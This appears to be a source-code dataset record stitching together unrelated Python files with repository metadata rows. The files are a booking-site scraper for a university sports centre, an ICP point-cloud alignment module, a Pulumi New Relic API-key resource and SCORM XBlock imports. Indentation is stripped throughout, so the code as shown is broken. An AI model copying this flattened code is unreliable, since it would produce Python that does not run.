soup = BeautifulSoup(body)
if soup.find("a", href="logout.php") is None:
raise AuthenticationFailure
print "Logged in successfully as '%s'" % soup.find("div", "pullrightfooterinfo").string.strip()
pass
def __init__(self, username, password, mode='S_RU'):
self.username = username
self.password = password
self.mode = mode
self.b = browser.Browser("Vrijbrief/0.1")
self.login()
pass
def parseDate(self, date):
matched = RX_FULLDATE.match(date)
d, mstr, y = matched.groups()
m = MONTHS.index(mstr)+1
return datetime.date(int(y), int(m), int(d))
def listCategories(self):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/laanbod.php")
soup = BeautifulSoup(body, "html5lib")
groups = soup.find("form", id="target")
current_series = None
for tr in groups.children:
if type(tr) is NavigableString:
continue
elif tr.has_attr('class') and "list-group-item-heading" in tr["class"]:
current_series = tr.find("b").get_text().strip()
elif tr.name == "label":
assert current_series is not None
inputradio = tr.find("input")
assert inputradio["name"] == "PRESET[Laanbod][inschrijving_id_pool_id][]"
value = inputradio["value"]
pool = tr.find('i').get_text().strip()
yield value, current_series, pool
def listEntries(self, catId):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/laanbod.php", [("PRESET[Laanbod][inschrijving_id_pool_id][]", catId)])
soup = BeautifulSoup(body)
groups = soup.find("table", class_="responstable clickabletr")
for tr in groups.find_all("tr"):
if not tr.has_attr("class") or "clickabletr" not in tr["class"]:
continue
fields = tr.find_all("td")
date = fields[0].get_text().strip()
time = fields[1].get_text().strip()
accesskey = fields[2].a["href"]
occupation = fields[3].get_text().strip()
availability = 0
if occupation != "VOL":
occupation_matched = RX_OCCUPATION.match(occupation)
assert occupation_matched
availability = int(occupation_matched.groups()[1]) - int(occupation_matched.groups()[0])
time_matched = RX_TIME.match(time)
assert(time_matched)
startTime, endTime = time_matched.groups()
date = self.parseDate(date)
yield date, startTime, endTime, availability, accesskey
pass
def addEntry(self, accesskey):
# View entry page
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/" + accesskey)
soup = BeautifulSoup(body)
a = soup.find("a", class_="btn btn-responsive btn-success pull-right")
assert(a.get_text().strip() == "Toevoegen aan Keuzelijst")
# Press on add-button
confirmkey = a["href"]
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/" + confirmkey)
pass
def confirm(self):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/bevestigen.php",
[("actie", "bevestig"), ("tabel", "klant"), ("kolom", "klant_id"), ("waarde", self.username)])
# Confirming logs you out; thus we need to log back in
self.login()
pass
def listReservations(self):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/overzicht.php")
soup = BeautifulSoup(body)
reservations_label = soup.find(text="Reserveringen Locaties")
if reservations_label is None:
return
thr = list(reservations_label.parents)[3]
assert thr.name == "tr"
for tr in thr.find_next_siblings("tr"):
fields = tr.find_all("td")
accesskey = fields[0].a["href"]
pool = fields[1].get_text().strip()
date = fields[2].get_text().strip()
time = fields[3].get_text().strip()
time_matched = RX_TIME.match(time)
assert(time_matched)
startTime, endTime = time_matched.groups()
date = self.parseDate(date)
yield pool, date, startTime, endTime, accesskey
pass
def killReservation(self, accesskey):
body, _headers = self.b.open_url("https://publiek.usc.ru.nl/publiek/" + accesskey)
soup = BeautifulSoup(body)
linschrijving_id = soup.find("input", attrs={"name": "linschrijving_id"})["value"]
self.b.open_url("https://publiek.usc.ru.nl/publiek/" + accesskey,
[("linschrijving_id", linschrijving_id), ("actie", "bevestig"), ("tabel", "klant"), ("kolom", "klant_id"), ("waarde", self.username)])
print "Killed %s" % linschrijving_id
pass
| 38.196429 | 158 | 0.555244 | 6,041 | 0.941406 | 3,140 | 0.489325 | 0 | 0 | 0 | 0 | 1,566 | 0.244039 |
1fb09b5991e8d87644d6f495740d136659baa06e
| 10,805 |
py
|
Python
|
scar_core/scripts/icp.py
|
yycho0108/SSAM
|
8b93f84cb162e475231e1de29360e6c6f1632363
|
[
"MIT"
] | null | null | null |
scar_core/scripts/icp.py
|
yycho0108/SSAM
|
8b93f84cb162e475231e1de29360e6c6f1632363
|
[
"MIT"
] | null | null | null |
scar_core/scripts/icp.py
|
yycho0108/SSAM
|
8b93f84cb162e475231e1de29360e6c6f1632363
|
[
"MIT"
] | null | null | null |
import numpy as np
from sklearn.neighbors import NearestNeighbors
import cv2
def estimate_normals(p, k=20):
neigh = NearestNeighbors(n_neighbors=k)
neigh.fit(p)
distances, indices = neigh.kneighbors(return_distance=True)
dp = (p[indices] - p[:,None])
U, s, V = np.linalg.svd(dp.transpose(0,2,1))
nv = U[:, :, -1]
return nv / np.linalg.norm(nv)
def test_norm():
np.random.seed(3)
from matplotlib import pyplot as plt
pt_map = np.concatenate([get_line(n=33, s=1.0) for _ in range(3)], axis=0)
pt_map = np.random.normal(loc=pt_map, scale=0.05)
nv = estimate_normals(pt_map)
plt.plot(pt_map[:,0], pt_map[:,1], '.', label='map')
plt.quiver(
pt_map[:,0], pt_map[:,1],
nv[:,0], nv[:,1],
scale_units='xy',
angles='xy'
)
plt.gca().set_aspect('equal', 'datalim')
plt.legend()
plt.show()
def stable_subsample(p):
"""
Geometrically Stable ICP Subsampling with constraints analysis
Gelfand et al. 2003
http://www.people.vcu.edu/~dbandyop/pubh8472/Gelfand_SVC.pdf
https://graphics.stanford.edu/papers/stabicp/stabicp.pdf
"""
# TODO : implement
pass
class ICP():
def __init__(self):
pass
@staticmethod
def best_fit_transform(A, B):
'''
Calculates the least-squares best-fit transform that maps corresponding points A to B in m spatial dimensions
Input:
A: Naxm numpy array of corresponding points
B: Nbxm numpy array of corresponding points
Returns:
T: (m+1)x(m+1) homogeneous transformation matrix that maps A on to B
R: mxm rotation matrix
t: mx1 translation vector
'''
# assert A.shape == B.shape
# get number of dimensions
m = A.shape[1]
# translate points to their centroids
centroid_A = np.mean(A, axis=0)
centroid_B = np.mean(B, axis=0)
AA = A - centroid_A
BB = B - centroid_B
# rotation matrix
H = np.dot(AA.T, BB)
U, S, Vt = np.linalg.svd(H)
R = np.dot(Vt.T, U.T)
# special reflection case
if np.linalg.det(R) < 0:
Vt[m-1,:] *= -1
R = np.dot(Vt.T, U.T)
# translation
t = centroid_B.T - np.dot(R,centroid_A.T)
# homogeneous transformation
T = np.identity(m+1)
T[:m, :m] = R
T[:m, m] = t
return T, R, t
@staticmethod
def best_fit_transform_point_to_plane(src, dst):
# TODO : generalize to N-d cases?
# TODO : use neighborhood from prior computations?
nvec = estimate_normals(dst, k=20)
# construct according to
# https://gfx.cs.princeton.edu/proj/iccv05_course/iccv05_icp_gr.pdf
A_lhs = np.cross(src, nvec)[:,None]
A_rhs = nvec
Amat = np.concatenate([A_lhs, A_rhs], axis=1) # == Nx3
# == Experimental : Stability Analysis ==
#C = Amat.T.dot(Amat) # 3x3 cov-mat
#w,v = np.linalg.eig(C)
##c = w[0] / w[-1] # stability
#c = w[-1]
##print('w[-1] : {}'.format(w[-1]))
c = None
# =======================================
bvec = - ((src - dst)*(nvec)).sum(axis=-1)
tvec = np.linalg.pinv(Amat).dot(bvec) # == (dh, dx, dy)
R = Rmat( tvec[0] )
t = tvec[1:]
T = np.eye(3, dtype=np.float32)
T[:2, :2] = R
T[:2, 2] = t
return T, R, t, c
@staticmethod
def nearest_neighbor(src, dst):
'''
Find the nearest (Euclidean) neighbor in dst for each point in src
Input:
src: Naxm array of points
dst: Nbxm array of points
Output:
distances: Euclidean distances of the nearest neighbor
indices: dst indices of the nearest neighbor
'''
assert src.shape[1:] == dst.shape[1:]
neigh = NearestNeighbors(n_neighbors=1)
neigh.fit(dst)
distances, indices = neigh.kneighbors(src, return_distance=True)
return distances.ravel(), indices.ravel()
@staticmethod
def projected_neighbor(src, dst, origin):
"""
index-matching correspondences, according to Blais and Levine, '95
https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=400574
"""
# TODO : implement
pass
@staticmethod
def icp(A, B, init_pose=None, max_iterations=20, tolerance=0.001):
'''
The Iterative Closest Point method: finds best-fit transform that maps points A on to points B
Input:
A: Naxm numpy array of source mD points
B: Nbxm numpy array of destination mD point
init_pose: (m+1)x(m+1) homogeneous transformation
max_iterations: exit algorithm after max_iterations
tolerance: convergence criteria
Output:
T: final homogeneous transformation that maps A on to B, T.A = B
distances: Euclidean distances (errors) of the nearest neighbor
i: number of iterations to converge
'''
# assert A.shape == B.shape
# get number of dimensions
ndim = A.shape[1]
nA, nB = A.shape[0], B.shape[0]
assert(A.shape[1:] == B.shape[1:])
# make points homogeneous, copy them to maintain the originals
src = np.ones((nA,ndim+1), dtype=np.float32)
dst = np.ones((nB,ndim+1), dtype=np.float32)
src[:, :ndim] = A
dst[:, :ndim] = B
# apply the initial pose estimation
if init_pose is not None:
src = np.dot(init_pose, src)
prev_error = 0
for i in range(max_iterations):
# find the nearest neighbors between the current source and destination points
distances, indices = ICP.nearest_neighbor(src[:,:-1], dst[:,:-1])
# compute the transformation between the current source and nearest destination points
#T,_,_ = ICP.best_fit_transform(src[:,:-1], dst[indices,:-1])
T,_,_,_ = ICP.best_fit_transform_point_to_plane(src[:,:-1], dst[indices,:-1])
src = np.dot(src,T.T) # right-multiply transform matrix
# check error
mean_error = np.mean(distances)
if np.abs(prev_error - mean_error) < tolerance:
break
prev_error = mean_error
# calculate final transformation
#T,_,_ = ICP.best_fit_transform(A, src[:,:-1])
T,_,_,c = ICP.best_fit_transform_point_to_plane(A, src[:,:-1])
#print('stability : {}'.format(c))
# reprojection-error based filter
# (i.e. without RANSAC)
# TODO : this is probably faster, but does performance degrade?
delta = np.linalg.norm(dst[indices] - src, axis=-1)
msk = (delta < 0.2)
T3 = None
# alternative - refine transform
# (mostly, compute the mask and validate truth)
# opencv version - RANSAC
# doesn't really do anything
#T3, msk = cv2.estimateAffine2D(
# src[None,:,:-1],
# dst[None,indices,:-1],
# method=cv2.FM_RANSAC,
# ransacReprojThreshold=0.2, # TODO : expose this param
# maxIters=2000,
# confidence=0.9999,
# refineIters=100
# )
ms = msk.sum()
#if ms != msk.size:
# print '{}% = {}/{}'.format(float(ms)/msk.size*100, ms, msk.size)
inlier_ratio = float(ms) / msk.size
#inlier_ratio *= np.float32( c > 3e-2 ) # account for stability
# TODO : is it reasonable to account for stability?
# I think c==3e-2 equates to ~10 deg rotation / 0.17m translation
# not 100% sure about this.
if T3 is not None:
#print 'T3'
#print T[:2] - T3
#if inlier_ratio > 0.75:
# T3 = np.concatenate([T3, [[0,0,1]] ], axis=0)
# T = T.dot(T3)
# TODO : revive? idk
pass
return T, distances, indices, i, inlier_ratio
def Rmat(x):
c,s = np.cos(x), np.sin(x)
R = np.float32([c,-s,s,c]).reshape(2,2)
return R
def get_line(n, s):
# return Nx2 line
t = np.linspace(0, s, n)
pt = np.stack([t, np.zeros_like(t)], axis=-1)
h = np.random.uniform(-np.pi, np.pi)
o = np.random.uniform(-1.0, 1.0)
return pt.dot(Rmat(h).T) + o
def main():
np.random.seed(0)
from matplotlib import pyplot as plt
# parameters
n_size = 100
n_repeat = 100
s_noise = 0.1
pt_map = np.concatenate([get_line(n=33, s=1.0) for _ in range(3)], axis=0)
# get geometric transformation
# scan_{map} -> scan_{base_link}
h = np.random.uniform(-np.pi/4, np.pi/4)
R = Rmat(h)
t = np.random.uniform(-1.0, 1.0, size=(1,2))
T0 = np.eye(3)
T0[:2,:2] = R
T0[:2,2] = t
print ('T (x,y,h) : ({}, {}, {})'.format(t[0,0], t[0,1], h))
errs = []
#n_sub = 20
#n_subs = np.linspace(1, len(pt_map), num=10).astype(np.int32)
n_subs = [50]
for n_sub in n_subs:
print('n_sub = {}'.format(n_sub))
err_i = []
for _ in range(n_repeat):
# subsample
pt_scan = np.copy(pt_map[np.random.choice(pt_map.shape[0], size=n_sub, replace=False)])
# apply transform
pt_scan = pt_scan.dot(R.T) + t
# apply noise
pt_scan = np.random.normal(loc=pt_scan, scale=s_noise)
T, distances, indices, iterations, inl = ICP.icp(pt_scan, pt_map,
tolerance=0.000001)
pt_scan_r = pt_scan.dot(T[:2,:2].T) + T[:2,2].reshape(1,2)
# scan_{base_link} -> scan_{map}
h2 = np.arctan2(T[1,0], T[1,1])
t2 = T[:2,2]
#print ('T_inv (x,y,h) : ({}, {}, {})'.format(t2[0], t2[1], h2))
# compute error metric
#print T0.dot(T)
err_T = T0.dot(T)
dt = err_T[:2,2]
dh = np.arctan2(err_T[1,0], err_T[1,1])
err_i.append(np.abs([dt[0], dt[1], dh]))
#print('err (dx,dy,dh) : ({},{},{})'.format(dt[0],dt[1],dh))
err_i = np.mean(err_i, axis=0)
errs.append(err_i)
plt.plot(pt_map[:,0], pt_map[:,1], '.', label='map')
plt.plot(pt_scan[:,0], pt_scan[:,1], '.', label='scan')
plt.plot(pt_scan_r[:,0], pt_scan_r[:,1], '.', label='scan-T')
plt.legend()
plt.show()
#plt.plot(np.float32(n_subs) / len(pt_map), errs)
#plt.legend(['dx','dy','dh'])
#plt.xlabel('sample ratio')
#plt.ylabel('error')
#plt.title('icp characterization')
#plt.show()
if __name__ == "__main__":
#main()
test_norm()
| 31.686217 | 117 | 0.544563 | 6,945 | 0.642758 | 0 | 0 | 6,866 | 0.635447 | 0 | 0 | 4,551 | 0.421194 |
1fb0d351102592159ee6a917dd248009cd700533
| 20,393 |
py
|
Python
|
sdk/python/pulumi_newrelic/api_access_key.py
|
bob-bins/pulumi-newrelic
|
f8a121fb7d6e6ad979d3ccf72467b9e89769e305
|
[
"ECL-2.0",
"Apache-2.0"
] | 6 |
2019-09-17T20:41:26.000Z
|
2022-01-13T23:54:14.000Z
|
sdk/python/pulumi_newrelic/api_access_key.py
|
bob-bins/pulumi-newrelic
|
f8a121fb7d6e6ad979d3ccf72467b9e89769e305
|
[
"ECL-2.0",
"Apache-2.0"
] | 136 |
2019-04-29T21:34:57.000Z
|
2022-03-30T17:07:03.000Z
|
sdk/python/pulumi_newrelic/api_access_key.py
|
bob-bins/pulumi-newrelic
|
f8a121fb7d6e6ad979d3ccf72467b9e89769e305
|
[
"ECL-2.0",
"Apache-2.0"
] | 3 |
2019-10-05T10:33:59.000Z
|
2021-06-15T16:37:49.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ApiAccessKeyArgs', 'ApiAccessKey']
@pulumi.input_type
class ApiAccessKeyArgs:
def __init__(__self__, *,
account_id: pulumi.Input[int],
key_type: pulumi.Input[str],
ingest_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a ApiAccessKey resource.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
:param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID yous wish to create the API access key for in an account.
"""
pulumi.set(__self__, "account_id", account_id)
pulumi.set(__self__, "key_type", key_type)
if ingest_type is not None:
pulumi.set(__self__, "ingest_type", ingest_type)
if name is not None:
pulumi.set(__self__, "name", name)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Input[int]:
"""
The New Relic account ID of the account you wish to create the API access key.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: pulumi.Input[int]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter(name="keyType")
def key_type(self) -> pulumi.Input[str]:
"""
What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
"""
return pulumi.get(self, "key_type")
@key_type.setter
def key_type(self, value: pulumi.Input[str]):
pulumi.set(self, "key_type", value)
@property
@pulumi.getter(name="ingestType")
def ingest_type(self) -> Optional[pulumi.Input[str]]:
"""
Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
"""
return pulumi.get(self, "ingest_type")
@ingest_type.setter
def ingest_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ingest_type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the key.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
Any notes about this ingest key.
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
Required if `key_type = USER`. The New Relic user ID yous wish to create the API access key for in an account.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
@pulumi.input_type
class _ApiAccessKeyState:
def __init__(__self__, *,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering ApiAccessKey resources.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
:param pulumi.Input[str] key: The actual API key. This attribute is masked and not be visible in your terminal, CI, etc.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
:param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID yous wish to create the API access key for in an account.
"""
if account_id is not None:
pulumi.set(__self__, "account_id", account_id)
if ingest_type is not None:
pulumi.set(__self__, "ingest_type", ingest_type)
if key is not None:
pulumi.set(__self__, "key", key)
if key_type is not None:
pulumi.set(__self__, "key_type", key_type)
if name is not None:
pulumi.set(__self__, "name", name)
if notes is not None:
pulumi.set(__self__, "notes", notes)
if user_id is not None:
pulumi.set(__self__, "user_id", user_id)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> Optional[pulumi.Input[int]]:
"""
The New Relic account ID of the account you wish to create the API access key.
"""
return pulumi.get(self, "account_id")
@account_id.setter
def account_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "account_id", value)
@property
@pulumi.getter(name="ingestType")
def ingest_type(self) -> Optional[pulumi.Input[str]]:
"""
Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
"""
return pulumi.get(self, "ingest_type")
@ingest_type.setter
def ingest_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ingest_type", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
The actual API key. This attribute is masked and not be visible in your terminal, CI, etc.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="keyType")
def key_type(self) -> Optional[pulumi.Input[str]]:
"""
What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
"""
return pulumi.get(self, "key_type")
@key_type.setter
def key_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key_type", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the key.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def notes(self) -> Optional[pulumi.Input[str]]:
"""
Any notes about this ingest key.
"""
return pulumi.get(self, "notes")
@notes.setter
def notes(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "notes", value)
@property
@pulumi.getter(name="userId")
def user_id(self) -> Optional[pulumi.Input[int]]:
"""
Required if `key_type = USER`. The New Relic user ID yous wish to create the API access key for in an account.
"""
return pulumi.get(self, "user_id")
@user_id.setter
def user_id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "user_id", value)
class ApiAccessKey(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
"""
Use this resource to programmatically create and manage the following types of keys:
- [User API keys](https://docs.newrelic.com/docs/apis/get-started/intro-apis/types-new-relic-api-keys#user-api-key)
- License (or ingest) keys, including:
- General [license key](https://docs.newrelic.com/docs/accounts/install-new-relic/account-setup/license-key) used for APM
- [Browser license key](https://docs.newrelic.com/docs/browser/new-relic-browser/configuration/copy-browser-monitoring-license-key-app-id)
Please visit the New Relic article ['Use NerdGraph to manage license keys and User API keys'](https://docs.newrelic.com/docs/apis/nerdgraph/examples/use-nerdgraph-manage-license-keys-user-keys)
for more information.
> **IMPORTANT!**
Please be very careful when updating existing `ApiAccessKey` resources as only `newrelic_api_access_key.name`
and `newrelic_api_access_key.notes` are updatable. All other resource attributes will force a resource recreation which will
invalidate the previous API key(s).
## Example Usage
```python
import pulumi
import pulumi_newrelic as newrelic
foobar = newrelic.ApiAccessKey("foobar",
account_id=1234567,
ingest_type="LICENSE",
key_type="INGEST",
notes="To be used with service X")
```
## Import
Existing API access keys can be imported using a composite ID of `<api_access_key_id>:<key_type>`. `<key_type>` will be either `INGEST` or `USER`. For example
```sh
$ pulumi import newrelic:index/apiAccessKey:ApiAccessKey foobar "1234567:INGEST"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
:param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID yous wish to create the API access key for in an account.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApiAccessKeyArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Use this resource to programmatically create and manage the following types of keys:
- [User API keys](https://docs.newrelic.com/docs/apis/get-started/intro-apis/types-new-relic-api-keys#user-api-key)
- License (or ingest) keys, including:
- General [license key](https://docs.newrelic.com/docs/accounts/install-new-relic/account-setup/license-key) used for APM
- [Browser license key](https://docs.newrelic.com/docs/browser/new-relic-browser/configuration/copy-browser-monitoring-license-key-app-id)
Please visit the New Relic article ['Use NerdGraph to manage license keys and User API keys'](https://docs.newrelic.com/docs/apis/nerdgraph/examples/use-nerdgraph-manage-license-keys-user-keys)
for more information.
> **IMPORTANT!**
Please be very careful when updating existing `ApiAccessKey` resources as only `newrelic_api_access_key.name`
and `newrelic_api_access_key.notes` are updatable. All other resource attributes will force a resource recreation which will
invalidate the previous API key(s).
## Example Usage
```python
import pulumi
import pulumi_newrelic as newrelic
foobar = newrelic.ApiAccessKey("foobar",
account_id=1234567,
ingest_type="LICENSE",
key_type="INGEST",
notes="To be used with service X")
```
## Import
Existing API access keys can be imported using a composite ID of `<api_access_key_id>:<key_type>`. `<key_type>` will be either `INGEST` or `USER`. For example
```sh
$ pulumi import newrelic:index/apiAccessKey:ApiAccessKey foobar "1234567:INGEST"
```
:param str resource_name: The name of the resource.
:param ApiAccessKeyArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApiAccessKeyArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApiAccessKeyArgs.__new__(ApiAccessKeyArgs)
if account_id is None and not opts.urn:
raise TypeError("Missing required property 'account_id'")
__props__.__dict__["account_id"] = account_id
__props__.__dict__["ingest_type"] = ingest_type
if key_type is None and not opts.urn:
raise TypeError("Missing required property 'key_type'")
__props__.__dict__["key_type"] = key_type
__props__.__dict__["name"] = name
__props__.__dict__["notes"] = notes
__props__.__dict__["user_id"] = user_id
__props__.__dict__["key"] = None
super(ApiAccessKey, __self__).__init__(
'newrelic:index/apiAccessKey:ApiAccessKey',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_id: Optional[pulumi.Input[int]] = None,
ingest_type: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
key_type: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
notes: Optional[pulumi.Input[str]] = None,
user_id: Optional[pulumi.Input[int]] = None) -> 'ApiAccessKey':
"""
Get an existing ApiAccessKey resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] account_id: The New Relic account ID of the account you wish to create the API access key.
:param pulumi.Input[str] ingest_type: Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
:param pulumi.Input[str] key: The actual API key. This attribute is masked and not be visible in your terminal, CI, etc.
:param pulumi.Input[str] key_type: What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
:param pulumi.Input[str] name: The name of the key.
:param pulumi.Input[str] notes: Any notes about this ingest key.
:param pulumi.Input[int] user_id: Required if `key_type = USER`. The New Relic user ID yous wish to create the API access key for in an account.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApiAccessKeyState.__new__(_ApiAccessKeyState)
__props__.__dict__["account_id"] = account_id
__props__.__dict__["ingest_type"] = ingest_type
__props__.__dict__["key"] = key
__props__.__dict__["key_type"] = key_type
__props__.__dict__["name"] = name
__props__.__dict__["notes"] = notes
__props__.__dict__["user_id"] = user_id
return ApiAccessKey(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountId")
def account_id(self) -> pulumi.Output[int]:
"""
The New Relic account ID of the account you wish to create the API access key.
"""
return pulumi.get(self, "account_id")
@property
@pulumi.getter(name="ingestType")
def ingest_type(self) -> pulumi.Output[str]:
"""
Required if `key_type = INGEST`. Valid options are `BROWSER` or `LICENSE`, case-sensitive.
"""
return pulumi.get(self, "ingest_type")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
The actual API key. This attribute is masked and not be visible in your terminal, CI, etc.
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="keyType")
def key_type(self) -> pulumi.Output[str]:
"""
What type of API key to create. Valid options are `INGEST` or `USER`, case-sensitive.
"""
return pulumi.get(self, "key_type")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the key.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def notes(self) -> pulumi.Output[str]:
"""
Any notes about this ingest key.
"""
return pulumi.get(self, "notes")
@property
@pulumi.getter(name="userId")
def user_id(self) -> pulumi.Output[int]:
"""
Required if `key_type = USER`. The New Relic user ID yous wish to create the API access key for in an account.
"""
return pulumi.get(self, "user_id")
| 42.574113 | 201 | 0.630903 | 19,967 | 0.97911 | 0 | 0 | 17,617 | 0.863875 | 0 | 0 | 10,456 | 0.512725 |
1fb15d8fc5f2340ec039cd29cb846d5d8253d9c0
| 9,501 |
py
|
Python
|
scormxblock/scormxblock.py
|
Pearson-Advance/edx_xblock_scorm
|
eff4f18963424ac090662e03040dc8f003770cd3
|
[
"Apache-2.0"
] | null | null | null |
scormxblock/scormxblock.py
|
Pearson-Advance/edx_xblock_scorm
|
eff4f18963424ac090662e03040dc8f003770cd3
|
[
"Apache-2.0"
] | 1 |
2020-10-27T20:04:30.000Z
|
2020-10-27T20:04:30.000Z
|
scormxblock/scormxblock.py
|
Pearson-Advance/edx_xblock_scorm
|
eff4f18963424ac090662e03040dc8f003770cd3
|
[
"Apache-2.0"
] | null | null | null |
import json
import re
import os
import pkg_resources
import zipfile
import shutil
import xml.etree.ElementTree as ET
from django.conf import settings
from django.template import Context, Template
from webob import Response
from xblock.core import XBlock
